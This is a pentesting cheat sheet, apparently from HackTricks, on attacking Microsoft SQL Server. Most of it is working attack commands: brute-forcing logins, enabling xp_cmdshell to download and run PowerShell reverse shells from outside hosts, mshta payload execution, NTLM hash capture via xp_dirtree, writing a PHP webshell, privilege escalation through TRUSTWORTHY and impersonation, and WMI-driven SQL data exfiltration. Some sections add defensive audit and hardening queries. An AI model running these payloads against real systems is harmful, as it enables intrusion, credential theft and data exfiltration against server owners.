1433 - Pentesting MSSQL - Microsoft SQL Server
Basic Information
From wikipedia:
Microsoft SQL Server is a relational database management system developed by Microsoft. As a database server, its primary function is to store and retrieve data as requested by other software applications, which may run either on the same computer or on another computer across a network (including the Internet).
Default port: 1433
1433/tcp open  ms-sql-s      Microsoft SQL Server 2017 14.00.1000.00; RTM
Landing in a managed Database-as-a-Service (DBaaS)
Everything that depends on "owning the host" (for example privilege escalation, lateral movement and OS command execution) disappears in DBaaS. Pentesting in these environments has to shift towards application-layer abuse, data exfiltration through SQL logic, misconfigured IAM roles or poor network/VPC design. For example, the Amazon RDS documentation explicitly states that xp_cmdshell and the TRUSTWORTHY database property are not supported.
warning
You get a database endpoint, not a server. The cloud provider manages the host operating system, the database engine binaries and many of the security policies.
Default MS-SQL System Tables
- master Database: This database is crucial because it records all system-level details of the SQL Server instance.
- msdb Database: SQL Server Agent uses this database to manage the scheduling of alerts and jobs.
- model Database: Acts as the template for every new database on the SQL Server instance; any changes such as size, collation, recovery model and so on are reflected in newly created databases.
- Resource Database: A read-only database that holds the system objects shipped with SQL Server. Although these objects are physically stored in the Resource database, they are logically presented in the sys schema of every database.
- tempdb Database: Serves as a temporary storage area for temporary objects or intermediate result sets.
Enumeration
Automatic Enumeration
If you don't know anything about the service:
nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 <IP>
msf> use auxiliary/scanner/mssql/mssql_ping
tip
If you don't have credentials you can try to guess them. You can use nmap or metasploit. Be careful, you may block accounts if you fail to log in several times using an existing username.
Metasploit (need creds)
#Set USERNAME, RHOSTS and PASSWORD
#Set DOMAIN and USE_WINDOWS_AUTHENT if domain is used
#Steal NTLM
msf> use auxiliary/admin/mssql/mssql_ntlm_stealer #Steal NTLM hash, before executing run Responder
#Info gathering
msf> use admin/mssql/mssql_enum #Security checks
msf> use admin/mssql/mssql_enum_domain_accounts
msf> use admin/mssql/mssql_enum_sql_logins
msf> use auxiliary/admin/mssql/mssql_findandsampledata
msf> use auxiliary/scanner/mssql/mssql_hashdump
msf> use auxiliary/scanner/mssql/mssql_schemadump
#Search for interesting data
msf> use auxiliary/admin/mssql/mssql_findandsampledata
msf> use auxiliary/admin/mssql/mssql_idf
#Privesc
msf> use exploit/windows/mssql/mssql_linkcrawler
msf> use admin/mssql/mssql_escalate_execute_as #If the user has IMPERSONATION privilege, this will try to escalate
msf> use admin/mssql/mssql_escalate_dbowner #Escalate from db_owner to sysadmin
#Code execution
msf> use admin/mssql/mssql_exec #Execute commands
msf> use exploit/windows/mssql/mssql_payload #Uploads and execute a payload
#Add new admin user from meterpreter session
msf> use windows/manage/mssql_local_auth_bypass
Brute force
Manual Enumeration
Login
# Bruteforce using tickets, hashes, and passwords against the hosts listed on the hosts.txt
mssqlpwner hosts.txt brute -tl tickets.txt -ul users.txt -hl hashes.txt -pl passwords.txt
# Bruteforce using hashes, and passwords against the hosts listed on the hosts.txt
mssqlpwner hosts.txt brute -ul users.txt -hl hashes.txt -pl passwords.txt
# Bruteforce using tickets against the hosts listed on the hosts.txt
mssqlpwner hosts.txt brute -tl tickets.txt -ul users.txt
# Bruteforce using passwords against the hosts listed on the hosts.txt
mssqlpwner hosts.txt brute -ul users.txt -pl passwords.txt
# Bruteforce using hashes against the hosts listed on the hosts.txt
mssqlpwner hosts.txt brute -ul users.txt -hl hashes.txt
# Using Impacket mssqlclient.py
mssqlclient.py [-db volume] <DOMAIN>/<USERNAME>:<PASSWORD>@<IP>
## Recommended -windows-auth when you are going to use a domain. Use as domain the netBIOS name of the machine
mssqlclient.py [-db volume] -windows-auth <DOMAIN>/<USERNAME>:<PASSWORD>@<IP>
# Using sqsh
sqsh -S <IP> -U <Username> -P <Password> -D <Database>
## In case Windows Auth using "." as domain name for local user
sqsh -S <IP> -U .\\<Username> -P <Password> -D <Database>
## In sqsh you need to use GO after writing the query to send it
1> select 1;
2> go
Common Enumeration
# Get version
select @@version;
# Get user
select user_name();
# Get databases
SELECT name FROM master.dbo.sysdatabases;
# Use database
USE master
#Get table names
SELECT * FROM <databaseName>.INFORMATION_SCHEMA.TABLES;
#List Linked Servers
EXEC sp_linkedservers
SELECT * FROM sys.servers;
#List users
select sp.name as login, sp.type_desc as login_type, sl.password_hash, sp.create_date, sp.modify_date, case when sp.is_disabled = 1 then 'Disabled' else 'Enabled' end as status from sys.server_principals sp left join sys.sql_logins sl on sp.principal_id = sl.principal_id where sp.type not in ('G', 'R') order by sp.name;
#Create user with sysadmin privs
CREATE LOGIN hacker WITH PASSWORD = 'P@ssword123!'
EXEC sp_addsrvrolemember 'hacker', 'sysadmin'
#Enumerate links
enum_links
#Use a link
use_link [NAME]
Get Users
# Get all the users and roles
select * from sys.database_principals;
## This query filters a bit the results
select name,
create_date,
modify_date,
type_desc as type,
authentication_type_desc as authentication_type,
sid
from sys.database_principals
where type not in ('A', 'R')
order by name;
## Both of these select all the users of the current database (not the server).
## Interesting when you cannot access the table sys.database_principals
EXEC sp_helpuser
SELECT * FROM sysusers
Get Permissions
- Securable: Refers to the resources managed by SQL Server for access control. These fall into:
  - Server: for example databases, logins, endpoints, availability groups and server roles.
  - Database: for example database roles, application roles, schemas, certificates, full-text catalogs and users.
  - Schema: includes tables, views, stored procedures, functions, synonyms, etc.
- Permission: Associated with SQL Server securables, permissions such as ALTER, CONTROL and CREATE can be granted to a principal. Management of permissions happens at two levels:
  - Server Level using logins
  - Database Level using users
- Principal: Refers to the entity that is granted permission on a securable. Principals mainly include logins and database users. Access to securables is controlled by granting or denying permissions, or by including logins and users in roles that have access.
# Show all different securables names
SELECT distinct class_desc FROM sys.fn_builtin_permissions(DEFAULT);
# Show all possible permissions in MSSQL
SELECT * FROM sys.fn_builtin_permissions(DEFAULT);
# Get all my permissions over securable type SERVER
SELECT * FROM fn_my_permissions(NULL, 'SERVER');
# Get all my permissions over a database
USE <database>
SELECT * FROM fn_my_permissions(NULL, 'DATABASE');
# Get members of the role "sysadmin"
Use master
EXEC sp_helpsrvrolemember 'sysadmin';
# Get if the current user is sysadmin
SELECT IS_SRVROLEMEMBER('sysadmin');
# Get users that can run xp_cmdshell
Use master
EXEC sp_helprotect 'xp_cmdshell'
Tricks
Execute OS Commands
caution
Note that in order to execute commands it's not only necessary to have xp_cmdshell enabled, but also to have the EXECUTE permission on the xp_cmdshell stored procedure. You can check who (apart from sysadmins) can use xp_cmdshell with:
Use master
EXEC sp_helprotect 'xp_cmdshell'
# Username + Password + CMD command
crackmapexec mssql -d <Domain name> -u <username> -p <password> -x "whoami"
# Username + Hash + PS command
crackmapexec mssql -d <Domain name> -u <username> -H <HASH> -X '$PSVersionTable'
# Check if xp_cmdshell is enabled
SELECT * FROM sys.configurations WHERE name = 'xp_cmdshell';
# This turns on advanced options and is needed to configure xp_cmdshell
sp_configure 'show advanced options', '1'
RECONFIGURE
#This enables xp_cmdshell
sp_configure 'xp_cmdshell', '1'
RECONFIGURE
#One liner
EXEC sp_configure 'Show Advanced Options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
# Quickly check what the service account is via xp_cmdshell
EXEC master..xp_cmdshell 'whoami'
# Get Rev shell
EXEC xp_cmdshell 'echo IEX(New-Object Net.WebClient).DownloadString("http://10.10.14.13:8000/rev.ps1") | powershell -noprofile'
# Bypass blacklisted "EXEC xp_cmdshell"
'; DECLARE @x AS VARCHAR(100)='xp_cmdshell'; EXEC @x 'ping k7s3rpqn8ti91kvy0h44pre35ublza.burpcollaborator.net' --
# Executing custom assembly on the current server with windows authentication and executing hostname command
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth custom-asm hostname
# Executing custom assembly on the current server with windows authentication and executing hostname command on the SRV01 linked server
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 custom-asm hostname
# Executing the hostname command using stored procedures on the linked SRV01 server
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 exec hostname
# Executing the hostname command using stored procedures on the linked SRV01 server with sp_oacreate method
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 exec "cmd /c mshta http://192.168.45.250/malicious.hta" -command-execution-method sp_oacreate
WMI-based remote SQL collection (sqlcmd + CSV export)
Operators can use WMI from the IIS/application tier to execute a small batch script that authenticates to MSSQL, runs ad hoc queries and exports the results as CSV. This keeps the collection simple and makes it easier to blend in with normal administrator activity.
Example mssq.bat
@echo off
rem Usage: mssq.bat <server> <user> <pass> <"SQL"> <out.csv>
set S=%1
set U=%2
set P=%3
set Q=%4
set O=%5
rem Remove headers, trim trailing spaces, CSV separator = comma
sqlcmd -S %S% -U %U% -P %P% -Q "SET NOCOUNT ON; %Q%" -W -h -1 -s "," -o "%O%"
Invoke it remotely via WMI
wmic /node:SQLHOST /user:DOMAIN\user /password:Passw0rd! process call create "cmd.exe /c C:\\Windows\\Temp\\mssq.bat 10.0.0.5 sa P@ssw0rd \"SELECT TOP(100) name FROM sys.tables\" C:\\Windows\\Temp\\out.csv"
PowerShell alternative
$cmd = 'cmd.exe /c C:\\Windows\\Temp\\mssq.bat 10.0.0.5 sa P@ssw0rd "SELECT name FROM sys.databases" C:\\Windows\\Temp\\dbs.csv'
Invoke-WmiMethod -ComputerName SQLHOST -Class Win32_Process -Name Create -ArgumentList $cmd
Notes
- sqlcmd may be missing; fall back to osql, PowerShell Invoke-Sqlcmd, or a one-liner using System.Data.SqlClient.
- Watch the quoting; longer/complex queries are easier to supply from a file, or as a Base64-encoded argument that is decoded inside the batch/PowerShell stub.
- Exfil the CSV via SMB (e.g., copy from \\SQLHOST\C$\Windows\Temp) or compress it and move it through your C2.
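From the defensive side, the sqlcmd batches described above arrive with the client application name "SQLCMD" and the calling host's name. As an added example (not from the Unit 42 report or from this page), the following T-SQL first lists live sqlcmd/osql sessions and then creates an Extended Events session that records every batch such clients run, together with host and login; the session name and the C:\SQLLogs path are assumptions.

```sql
-- 1. Live sessions from ad hoc command-line clients (needs VIEW SERVER STATE).
--    An app-tier host or a service account showing up here with SQLCMD is the pattern above.
SELECT s.session_id, s.login_time, s.login_name, s.host_name, s.program_name,
       c.client_net_address, s.client_interface_name
FROM sys.dm_exec_sessions AS s
LEFT JOIN sys.dm_exec_connections AS c ON c.session_id = s.session_id
WHERE s.is_user_process = 1
  AND (s.program_name LIKE N'SQLCMD%' OR s.program_name LIKE N'OSQL%');
GO

-- 2. Persistent capture: every completed batch from sqlcmd/osql, with who ran it from where.
--    Session name and output path are assumed; adjust the path to an existing directory.
IF EXISTS (SELECT 1 FROM sys.server_event_sessions WHERE name = N'adhoc_sql_clients')
    DROP EVENT SESSION [adhoc_sql_clients] ON SERVER;
GO
CREATE EVENT SESSION [adhoc_sql_clients] ON SERVER
ADD EVENT sqlserver.sql_batch_completed (
    ACTION (sqlserver.client_app_name, sqlserver.client_hostname,
            sqlserver.server_principal_name, sqlserver.nt_username)
    -- XEvent predicates use comparator functions rather than LIKE
    WHERE sqlserver.like_i_sql_unicode_string(sqlserver.client_app_name, N'SQLCMD%')
       OR sqlserver.like_i_sql_unicode_string(sqlserver.client_app_name, N'OSQL%'))
ADD TARGET package0.event_file (SET filename = N'C:\SQLLogs\adhoc_sql_clients.xel',
                                max_file_size = (50), max_rollover_files = (4))
WITH (STARTUP_STATE = ON);
GO
ALTER EVENT SESSION [adhoc_sql_clients] ON SERVER STATE = START;
GO

-- 3. Review what was captured. The mssq.bat wrapper above prefixes every query with
--    "SET NOCOUNT ON;", so that prefix plus catalog queries (sys.tables, sys.databases)
--    from a non-DBA host is worth a closer look.
SELECT e.x.value('(event/@timestamp)[1]', 'datetime2')                                 AS event_time,
       e.x.value('(event/action[@name="client_hostname"]/value)[1]', 'sysname')        AS client_host,
       e.x.value('(event/action[@name="server_principal_name"]/value)[1]', 'sysname')  AS login_name,
       e.x.value('(event/data[@name="batch_text"]/value)[1]', 'nvarchar(max)')         AS batch_text
FROM sys.fn_xe_file_target_read_file(N'C:\SQLLogs\adhoc_sql_clients*.xel', NULL, NULL, NULL) AS f
CROSS APPLY (SELECT CAST(f.event_data AS xml)) AS e(x)
WHERE e.x.value('(event/data[@name="batch_text"]/value)[1]', 'nvarchar(max)') LIKE N'SET NOCOUNT ON;%'
ORDER BY event_time DESC;
```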
Get password hashes
SELECT * FROM master.sys.syslogins;
Steal NetNTLM hash / Relay attack
You should start an SMB server to capture the hash used in the authentication (impacket-smbserver or responder, for example).
xp_dirtree '\\<attacker_IP>\any\thing'
exec master.dbo.xp_dirtree '\\<attacker_IP>\any\thing'
EXEC master..xp_subdirs '\\<attacker_IP>\anything\'
EXEC master..xp_fileexist '\\<attacker_IP>\anything\'
# Capture hash
sudo responder -I tun0
sudo impacket-smbserver share ./ -smb2support
msf> use auxiliary/admin/mssql/mssql_ntlm_stealer
# Issuing NTLM relay attack on the SRV01 server
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 ntlm-relay 192.168.45.250
# Issuing NTLM relay attack on chain ID 2e9a3696-d8c2-4edd-9bcc-2908414eeb25
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -chain-id 2e9a3696-d8c2-4edd-9bcc-2908414eeb25 ntlm-relay 192.168.45.250
# Issuing NTLM relay attack on the local server with custom command
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth ntlm-relay 192.168.45.250
warning
You can check who (apart from sysadmins) has permission to run those MSSQL functions with:
Use master;
EXEC sp_helprotect 'xp_dirtree';
EXEC sp_helprotect 'xp_subdirs';
EXEC sp_helprotect 'xp_fileexist';
Using tools such as responder or Inveigh it's possible to steal the NetNTLM hash.
You can see how to use these tools in:
Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks
Abusing MSSQL trusted Links
Read this post to find more information about how to abuse this feature:
Write Files
To write files using MSSQL we need to enable Ole Automation Procedures, which requires admin privileges, and then execute some stored procedures to create the file:
# Enable Ole Automation Procedures
sp_configure 'show advanced options', 1
RECONFIGURE
sp_configure 'Ole Automation Procedures', 1
RECONFIGURE
# Create a File
DECLARE @OLE INT
DECLARE @FileID INT
EXECUTE sp_OACreate 'Scripting.FileSystemObject', @OLE OUT
EXECUTE sp_OAMethod @OLE, 'OpenTextFile', @FileID OUT, 'c:\inetpub\wwwroot\webshell.php', 8, 1
EXECUTE sp_OAMethod @FileID, 'WriteLine', Null, '<?php echo shell_exec($_GET["c"]);?>'
EXECUTE sp_OADestroy @FileID
EXECUTE sp_OADestroy @OLE
Read files with OPENROWSET
By default, MSSQL allows reading any file in the operating system to which the service account has read access. We can use the following SQL query:
SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents
However, the BULK option requires the ADMINISTER BULK OPERATIONS or the ADMINISTER DATABASE BULK OPERATIONS permission.
# Check if you have it
SELECT * FROM fn_my_permissions(NULL, 'SERVER') WHERE permission_name='ADMINISTER BULK OPERATIONS' OR permission_name='ADMINISTER DATABASE BULK OPERATIONS';
Error-based SQLi vector:
https://vuln.app/getItem?id=1+and+1=(select+x+from+OpenRowset(BULK+'C:\Windows\win.ini',SINGLE_CLOB)+R(x))--
RCE/Read files executing scripts (Python and R)
MSSQL may allow you to execute Python and/or R scripts. This code will be executed by a different user than the one using xp_cmdshell to execute commands.
Example trying to execute an R "Hello World!" that isn't working:
Example using the configured Python to perform several actions:
# Print the user being used (and execute commands)
EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("getpass").getuser())'
EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("os").system("whoami"))'
#Open and read a file
EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(open("C:\\inetpub\\wwwroot\\web.config", "r").read())'
#Multiline
EXECUTE sp_execute_external_script @language = N'Python', @script = N'
import sys
print(sys.version)
'
GO
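The xp_cmdshell, Ole Automation Procedures and external-script sections above all hinge on instance-wide surface-area options plus explicit EXECUTE grants. As an added defensive check (not part of the original page), the following T-SQL audits those options, lists the explicit grants in master on the procedures used above in one result, and shows the corrective statements; it assumes sysadmin (sp_configure needs ALTER SETTINGS).

```sql
-- 1. Surface-area options. value is the pending setting and value_in_use is what the
--    engine enforces now; a mismatch means a change that has not been RECONFIGUREd yet.
SELECT name,
       CAST(value AS int)        AS configured,
       CAST(value_in_use AS int) AS running,
       CASE WHEN CAST(value_in_use AS int) = 1 THEN 'REVIEW' ELSE 'ok' END AS verdict
FROM sys.configurations
WHERE name IN (N'xp_cmdshell', N'Ole Automation Procedures', N'external scripts enabled',
               N'clr enabled', N'Ad Hoc Distributed Queries', N'show advanced options')
ORDER BY name;

-- 2. Explicit EXECUTE grants in master on the procedures used above. Sysadmins are implicit
--    and do not appear here; this is one result instead of one sp_helprotect call per name.
USE master;
SELECT OBJECT_NAME(p.major_id) AS procedure_name,
       dp.name                 AS grantee,
       dp.type_desc            AS grantee_type,
       p.state_desc
FROM sys.database_permissions AS p
JOIN sys.database_principals AS dp ON dp.principal_id = p.grantee_principal_id
WHERE p.class = 1                               -- OBJECT_OR_COLUMN
  AND p.permission_name = N'EXECUTE'
  AND OBJECT_NAME(p.major_id) IN (N'xp_cmdshell', N'xp_dirtree', N'xp_subdirs', N'xp_fileexist',
                                  N'xp_regread', N'xp_regwrite', N'xp_instance_regwrite',
                                  N'sp_OACreate', N'sp_OAMethod')
ORDER BY procedure_name, grantee;

-- 3. Turn the options back off. Each sp_configure needs a RECONFIGURE; re-run query 1
--    afterwards and confirm configured = running = 0. Only disable 'clr enabled' and
--    'external scripts enabled' when no legitimate assemblies or ML scripts depend on them.
EXEC sp_configure 'show advanced options', 1;     RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;               RECONFIGURE;
EXEC sp_configure 'Ole Automation Procedures', 0; RECONFIGURE;
EXEC sp_configure 'external scripts enabled', 0;  RECONFIGURE;
EXEC sp_configure 'clr enabled', 0;               RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;     RECONFIGURE;
```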
Read Registry
Microsoft SQL Server provides multiple extended stored procedures that allow you to interact not only with the network but also with the file system and even the Windows Registry:
| Regular | Instance-aware |
|---|---|
| sys.xp_regread | sys.xp_instance_regread | 
| sys.xp_regenumvalues | sys.xp_instance_regenumvalues | 
| sys.xp_regenumkeys | sys.xp_instance_regenumkeys | 
| sys.xp_regwrite | sys.xp_instance_regwrite | 
| sys.xp_regdeletevalue | sys.xp_instance_regdeletevalue | 
| sys.xp_regdeletekey | sys.xp_instance_regdeletekey | 
| sys.xp_regaddmultistring | sys.xp_instance_regaddmultistring | 
| sys.xp_regremovemultistring | sys.xp_instance_regremovemultistring | 
# Example read registry
EXECUTE master.sys.xp_regread 'HKEY_LOCAL_MACHINE', 'Software\Microsoft\Microsoft SQL Server\MSSQL12.SQL2014\SQLServerAgent', 'WorkingDirectory';
# Example write and then read registry
EXECUTE master.sys.xp_instance_regwrite 'HKEY_LOCAL_MACHINE', 'Software\Microsoft\MSSQLSERVER\SQLServerAgent\MyNewKey', 'MyNewValue', 'REG_SZ', 'Now you see me!';
EXECUTE master.sys.xp_instance_regread 'HKEY_LOCAL_MACHINE', 'Software\Microsoft\MSSQLSERVER\SQLServerAgent\MyNewKey', 'MyNewValue';
# Example to check who can use these functions
Use master;
EXEC sp_helprotect 'xp_regread';
EXEC sp_helprotect 'xp_regwrite';
For more examples check the original source.
RCE with MSSQL User Defined Function - SQLHttp
It's possible to load a .NET dll within MSSQL with custom functions. This, however, requires dbo access, so you need a connection to the database as sa or with an Administrator role.
Follow this link to see an example.
RCE with autoadmin_task_agents
According to this post, it's also possible to load a remote dll and make MSSQL execute it with something like:
update autoadmin_task_agents set task_assembly_name = "class.dll", task_assembly_path="\\remote-server\\ping.dll",className="Class1.Class1";
using Microsoft.SqlServer.SmartAdmin;
using System;
using System.Diagnostics;

namespace Class1
{
    public class Class1 : TaskAgent
    {
        public Class1()
        {
            Process process = new Process();
            process.StartInfo.FileName = "cmd.exe";
            process.StartInfo.Arguments = "/c ping localhost -t";
            process.StartInfo.UseShellExecute = false;
            process.StartInfo.RedirectStandardOutput = true;
            process.Start();
            process.WaitForExit();
        }
        public override void DoWork()
        {
        }
        public override void ExternalJob(string command, LogBaseService jobLogger)
        {
        }
        public override void Start(IServicesFactory services)
        {
        }
        public override void Stop()
        {
        }
        public void Test()
        {
        }
    }
}
Other ways for RCE
There are other methods to get command execution, such as adding extended stored procedures, CLR Assemblies, SQL Server Agent Jobs, and external scripts.
MSSQL Privilege Escalation
From db_owner to sysadmin
If a regular user is given the role db_owner over a database owned by an admin user (such as sa) and that database is configured as trustworthy, that user can abuse these privileges to privesc because stored procedures created in there can execute as the owner (admin).
# Get owners of databases
SELECT suser_sname(owner_sid) FROM sys.databases
# Find trustworthy databases
SELECT a.name,b.is_trustworthy_on
FROM master..sysdatabases as a
INNER JOIN sys.databases as b
ON a.name=b.name;
# Get roles over the selected database (look for your username as db_owner)
USE <trustworthy_db>
SELECT rp.name as database_role, mp.name as database_user
from sys.database_role_members drm
join sys.database_principals rp on (drm.role_principal_id = rp.principal_id)
join sys.database_principals mp on (drm.member_principal_id = mp.principal_id)
# If you found you are db_owner of a trustworthy database, you can privesc:
--1. Create a stored procedure to add your user to sysadmin role
USE <trustworthy_db>
CREATE PROCEDURE sp_elevate_me
WITH EXECUTE AS OWNER
AS
EXEC sp_addsrvrolemember 'USERNAME','sysadmin'
--2. Execute stored procedure to get sysadmin role
USE <trustworthy_db>
EXEC sp_elevate_me
--3. Verify your user is a sysadmin
SELECT is_srvrolemember('sysadmin')
You can use a metasploit module:
msf> use auxiliary/admin/mssql/mssql_escalate_dbowner
Or a PS script:
# https://raw.githubusercontent.com/nullbind/Powershellery/master/Stable-ish/MSSQL/Invoke-SqlServer-Escalate-Dbowner.psm1
Import-Module .Invoke-SqlServerDbElevateDbOwner.psm1
Invoke-SqlServerDbElevateDbOwner -SqlUser myappuser -SqlPass MyPassword! -SqlServerInstance 10.2.2.184
Impersonation of other users
SQL Server has a special permission, named IMPERSONATE, that allows the executing user to take on the permissions of another user or login until the context is reset or the session ends.
# Find users you can impersonate
SELECT distinct b.name
FROM sys.server_permissions a
INNER JOIN sys.server_principals b
ON a.grantor_principal_id = b.principal_id
WHERE a.permission_name = 'IMPERSONATE'
# Check if the user "sa" or any other high privileged user is mentioned
# Impersonate sa user
EXECUTE AS LOGIN = 'sa'
SELECT SYSTEM_USER
SELECT IS_SRVROLEMEMBER('sysadmin')
# If you can't find any users, make sure to check for links
enum_links
# If there is a link of interest, re-run the above steps on each link
use_link [NAME]
tip
If you can impersonate a user, even if he isn't sysadmin, you should check if the user has access to other databases or linked servers.
Note that once you are sysadmin you can impersonate any other user:
-- Impersonate RegUser
EXECUTE AS LOGIN = 'RegUser'
-- Verify you are now running as the RegUser login
SELECT SYSTEM_USER
SELECT IS_SRVROLEMEMBER('sysadmin')
-- Change back to sa
REVERT
You can perform this attack with a metasploit module:
msf> auxiliary/admin/mssql/mssql_escalate_execute_as
Or with a PS script:
# https://raw.githubusercontent.com/nullbind/Powershellery/master/Stable-ish/MSSQL/Invoke-SqlServer-Escalate-ExecuteAs.psm1
Import-Module .Invoke-SqlServer-Escalate-ExecuteAs.psm1
Invoke-SqlServer-Escalate-ExecuteAs -SqlServerInstance 10.2.9.101 -SqlUser myuser1 -SqlPass MyPassword!
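Both escalation paths above (db_owner on a TRUSTWORTHY database owned by a sysadmin, and IMPERSONATE grants towards high-privilege logins) can be audited from the defender's side with one script. This is an added example, not part of the original page: it assumes sysadmin, and the remediation targets at the end are placeholders.

```sql
SET NOCOUNT ON;

-- 1. Server-level IMPERSONATE grants: who (grantee) may run as whom (target).
--    major_id is the principal being impersonated; a sysadmin target is a direct escalation path.
SELECT grantee.name AS grantee,
       target.name  AS can_impersonate,
       IS_SRVROLEMEMBER('sysadmin', target.name) AS target_is_sysadmin,
       p.state_desc
FROM sys.server_permissions AS p
JOIN sys.server_principals AS grantee ON grantee.principal_id = p.grantee_principal_id
JOIN sys.server_principals AS target  ON target.principal_id  = p.major_id
WHERE p.class_desc = 'SERVER_PRINCIPAL'
  AND p.permission_name = 'IMPERSONATE'
  AND p.state IN ('G', 'W')                      -- GRANT and GRANT WITH GRANT OPTION
ORDER BY target_is_sysadmin DESC, grantee.name;

-- 2. TRUSTWORTHY databases owned by a sysadmin login, with their db_owner members.
--    Members whose login is not already sysadmin can reach sysadmin via EXECUTE AS OWNER.
--    msdb is TRUSTWORTHY and sa-owned by default, so its db_owner members are reported too.
DECLARE @findings TABLE (db sysname, owner_login sysname, member sysname, member_type nvarchar(60));
DECLARE @db sysname, @owner sysname, @sql nvarchar(max);

DECLARE dbs CURSOR LOCAL FAST_FORWARD FOR
    SELECT name, SUSER_SNAME(owner_sid)
    FROM sys.databases
    WHERE is_trustworthy_on = 1
      AND state_desc = 'ONLINE'
      AND IS_SRVROLEMEMBER('sysadmin', SUSER_SNAME(owner_sid)) = 1;
OPEN dbs;
FETCH NEXT FROM dbs INTO @db, @owner;
WHILE @@FETCH_STATUS = 0
BEGIN
    -- One query per database; QUOTENAME keeps unusual names from breaking the dynamic SQL.
    SET @sql = N'SELECT ' + QUOTENAME(@db, '''') + N', ' + QUOTENAME(@owner, '''') + N', mp.name, mp.type_desc
                FROM ' + QUOTENAME(@db) + N'.sys.database_role_members AS drm
                JOIN ' + QUOTENAME(@db) + N'.sys.database_principals AS rp ON rp.principal_id = drm.role_principal_id
                JOIN ' + QUOTENAME(@db) + N'.sys.database_principals AS mp ON mp.principal_id = drm.member_principal_id
                WHERE rp.name = N''db_owner''
                  AND ISNULL(IS_SRVROLEMEMBER(''sysadmin'', SUSER_SNAME(mp.sid)), 0) = 0';
    INSERT INTO @findings EXEC sp_executesql @sql;
    FETCH NEXT FROM dbs INTO @db, @owner;
END
CLOSE dbs;
DEALLOCATE dbs;

SELECT * FROM @findings ORDER BY db, member;

-- Remediation examples (database, login and user names are placeholders):
-- ALTER DATABASE [AppDb] SET TRUSTWORTHY OFF;
-- ALTER AUTHORIZATION ON DATABASE::[AppDb] TO [low_priv_login];
-- REVOKE IMPERSONATE ON LOGIN::[sa] FROM [app_user];
```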
Using MSSQL for Persistence
https://blog.netspi.com/sql-server-persistence-part-1-startup-stored-procedures/
Extracting passwords from SQL Server Linked Servers
An attacker can extract SQL Server Linked Server passwords from the SQL instances and obtain them in clear text, giving the attacker passwords that can be used to acquire a greater foothold on the target. The script to extract and decrypt the passwords stored for the Linked Servers can be found here
Some requirements and configurations must be met for this exploit to work. First of all, you must have Administrator rights on the machine, or the ability to manage the SQL Server configuration.
After validating your permissions, you need to configure three things:
- Enable TCP/IP on the SQL Server instances;
- Add a start-up parameter, in this case the trace flag -T7806;
- Enable the remote admin connection.
To automate these configurations, this repository has the needed scripts. Besides having a powershell script for each step of the configuration, the repository also has a full script which combines the configuration scripts and the extraction and decryption of the passwords.
For further information, refer to the following links regarding this attack: Decrypting MSSQL Database Link Server Passwords
Troubleshooting the SQL Server Dedicated Administrator Connection
Local Privilege Escalation
The user running the MSSQL server will have the privilege token SeImpersonatePrivilege enabled.
You will probably be able to escalate to Administrator following one of these 2 pages:
RoguePotato, PrintSpoofer, SharpEfsPotato, GodPotato
Shodan
port:1433 !HTTP
References
- Unit 42 – Phantom Taurus: WMI-driven direct SQL collection via batch/sqlcmd
- https://stackoverflow.com/questions/18866881/how-to-get-the-list-of-all-database-users
- https://www.mssqltips.com/sqlservertip/6828/sql-server-login-user-permissions-fn-my-permissions/
- https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/
- https://blog.waynesheffield.com/wayne/archive/2017/08/working-registry-sql-server/
HackTricks Automatic Commands
Protocol_Name: MSSQL    #Protocol Abbreviation if there is one.
Port_Number:  1433     #Comma separated if there is more than one.
Protocol_Description: Microsoft SQL Server         #Protocol Abbreviation Spelled out
Entry_1:
Name: Notes
Description: Notes for MSSQL
Note: |
Microsoft SQL Server is a relational database management system developed by Microsoft. As a database server, it is a software product with the primary function of storing and retrieving data as requested by other software applications—which may run either on the same computer or on another computer across a network (including the Internet).
#sqsh -S 10.10.10.59 -U sa -P GWE3V65#6KFH93@4GWTG2G
###the goal is to get xp_cmdshell working###
1. try and see if it works
xp_cmdshell `whoami`
go
2. try to turn component back on
EXEC SP_CONFIGURE 'xp_cmdshell' , 1
reconfigure
go
xp_cmdshell `whoami`
go
3. 'advanced' turn it back on
EXEC SP_CONFIGURE 'show advanced options', 1
reconfigure
go
EXEC SP_CONFIGURE 'xp_cmdshell' , 1
reconfigure
go
xp_cmdshell 'whoami'
go
xp_cmdshell "powershell.exe -exec bypass iex(new-object net.webclient).downloadstring('http://10.10.14.60:8000/ye443.ps1')"
https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-mssql-microsoft-sql-server/index.html
Entry_2:
Name: Nmap for SQL
Description: Nmap with SQL Scripts
Command: nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 {IP}
Entry_3:
Name: MSSQL consoleless msf enumeration
Description: MSSQL enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion
